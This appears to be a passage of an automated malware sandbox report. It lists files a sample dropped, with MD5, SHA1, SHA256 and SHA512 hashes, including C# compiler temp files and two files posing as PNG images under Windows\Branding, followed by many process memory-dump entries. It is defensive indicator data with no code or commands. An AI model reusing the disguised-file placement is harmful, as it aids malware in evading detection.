da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\whondavr\CSCE37644D5932041E68775792EB5F66E5D.TMP
MD5
f71131bf046df43c7f612812f5ecbb99

SHA1
67c327745add99d7c9eb0752dce3500e06082411

SHA256
a85019409eacc6cd1a7a23b2f17755ceed4756922aa80bd3bd59aba00774842d

SHA512
d5f59a74175302b73668997998df2a74fed1fe3602d59b8d01b4b0997d70234813459dcc0a9987caba38f60527846c55ea8351d8b543f8135f55e57e77dddcdc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\whondavr\whondavr.0.cs
MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\whondavr\whondavr.cmdline
MD5
28b9b92a090f726cd4b28f0d340b762d

SHA1
a0e551d2a1e3e1981d9d3a19b5d0bbe921636985

SHA256
9cea4e71ee15e61231513bcb69252ef0a1be0826f6564ba6b46318d2385502ee

SHA512
4dcacbd21fb38f260d4f86508969ccf5250d9efb56de63ce79e79ad0f31c9f43a15340d3ca8944f5675b80de31ab5c8e145748de94e951ecbe2f4e5bd2ca45da

Download Submit
\Windows\Branding\mediasrv.png
MD5
37fb7ba711ffbe9d6ebb27d54e827966

SHA1
4d4d9303e011bcb14720b24239a1aacd58122f47

SHA256
81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

SHA512
3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

Download Submit
\Windows\Branding\mediasvc.png
MD5
2f916498a393e2f0d008d33a74c062ba

SHA1
404d52d4253ef3843ae3f2c4aff050f37fcd3f08

SHA256
d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

SHA512
d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

Download Submit
memory/112-116-0x0000000000000000-mapping.dmp

Download
memory/268-92-0x0000000000000000-mapping.dmp

Download
memory/268-122-0x0000000000000000-mapping.dmp

Download
memory/288-0-0x0000000000610000-0x0000000000901000-memory.dmp

Filesize
2.9MB

Download
memory/288-1-0x0000000000910000-0x0000000000921000-memory.dmp

Filesize
68KB

Download
memory/324-96-0x0000000000000000-mapping.dmp

Download
memory/324-13-0x0000000000000000-mapping.dmp

Download
memory/568-22-0x0000000000000000-mapping.dmp

Download
memory/568-28-0x00000000025D0000-0x00000000025D1000-memory.dmp

Filesize
4KB

Download
memory/568-24-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

Filesize
9.9MB

Download
memory/568-37-0x000000001B600000-0x000000001B601000-memory.dmp

Filesize
4KB

Download
memory/568-38-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/636-94-0x0000000000000000-mapping.dmp

Download
memory/680-102-0x0000000000000000-mapping.dmp

Download
memory/788-111-0x0000000000000000-mapping.dmp

Download
memory/788-123-0x0000000000000000-mapping.dmp

Download
memory/792-104-0x0000000000000000-mapping.dmp

Download
memory/852-90-0x0000000000000000-mapping.dmp

Download
memory/908-128-0x0000000000000000-mapping.dmp

Download
memory/920-101-0x0000000000000000-mapping.dmp

Download
memory/920-120-0x0000000000000000-mapping.dmp

Download
memory/920-131-0x0000000000000000-mapping.dmp

Download
memory/972-34-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

Filesize
9.9MB

Download
memory/972-77-0x000000001B600000-0x000000001B601000-memory.dmp

Filesize
4KB

Download
memory/972-29-0x0000000000000000-mapping.dmp

Download
memory/972-64-0x000000001A960000-0x000000001A961000-memory.dmp

Filesize
4KB

Download
memory/972-78-0x000000001B610000-0x000000001B611000-memory.dmp

Filesize
4KB

Download
memory/1000-99-0x0000000000000000-mapping.dmp

Download
memory/1008-97-0x0000000000000000-mapping.dmp

Download
memory/1204-107-0x0000000000000000-mapping.dmp

Download
memory/1320-132-0x0000000000000000-mapping.dmp

Download
memory/1352-40-0x0000000000000000-mapping.dmp

Download
memory/1352-42-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

Filesize
9.9MB

Download
memory/1504-117-0x0000000000000000-mapping.dmp

Download
memory/1504-127-0x0000000000000000-mapping.dmp

Download
memory/1520-112-0x0000000000000000-mapping.dmp

Download
memory/1552-119-0x0000000000000000-mapping.dmp

Download
memory/1556-103-0x0000000000000000-mapping.dmp

Download
memory/1564-10-0x0000000000000000-mapping.dmp

Download
memory/1576-95-0x0000000000000000-mapping.dmp

Download
memory/1580-87-0x0000000000000000-mapping.dmp

Download
memory/1592-100-0x0000000000000000-mapping.dmp

Download
memory/1648-89-0x0000000000000000-mapping.dmp

Download
memory/1660-105-0x0000000000000000-mapping.dmp

Download
memory/1668-108-0x0000000000000000-mapping.dmp

Download
memory/1708-91-0x0000000000000000-mapping.dmp

Download
memory/1728-125-0x0000000000000000-mapping.dmp

Download
memory/1764-113-0x0000000000000000-mapping.dmp

Download
memory/1764-126-0x0000000000000000-mapping.dmp

Download
memory/1780-106-0x0000000000000000-mapping.dmp

Download
memory/1796-4-0x0000000001F50000-0x0000000001F51000-memory.dmp

Filesize
4KB

Download
memory/1796-9-0x000000001B610000-0x000000001B611000-memory.dmp

Filesize
4KB

Download
memory/1796-18-0x000000001B760000-0x000000001B761000-memory.dmp

Filesize
4KB

Download
memory/1796-6-0x0000000002010000-0x0000000002011000-memory.dmp

Filesize
4KB

Download
memory/1796-5-0x000000001ACD0000-0x000000001ACD1000-memory.dmp

Filesize
4KB

Download
memory/1796-20-0x00000000247E0000-0x00000000247E1000-memory.dmp

Filesize
4KB

Download
memory/1796-19-0x0000000024760000-0x0000000024761000-memory.dmp

Filesize
4KB

Download
memory/1796-7-0x0000000001E30000-0x0000000001E31000-memory.dmp

Filesize
4KB

Download
memory/1796-21-0x0000000002670000-0x0000000002671000-memory.dmp

Filesize
4KB

Download
memory/1796-2-0x0000000000000000-mapping.dmp

Download
memory/1796-17-0x0000000001E50000-0x0000000001E51000-memory.dmp

Filesize
4KB

Download
memory/1796-3-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

Filesize
9.9MB

Download
memory/1864-93-0x0000000000000000-mapping.dmp

Download
memory/1928-114-0x0000000000000000-mapping.dmp

Download
memory/1988-98-0x0000000000000000-mapping.dmp

Download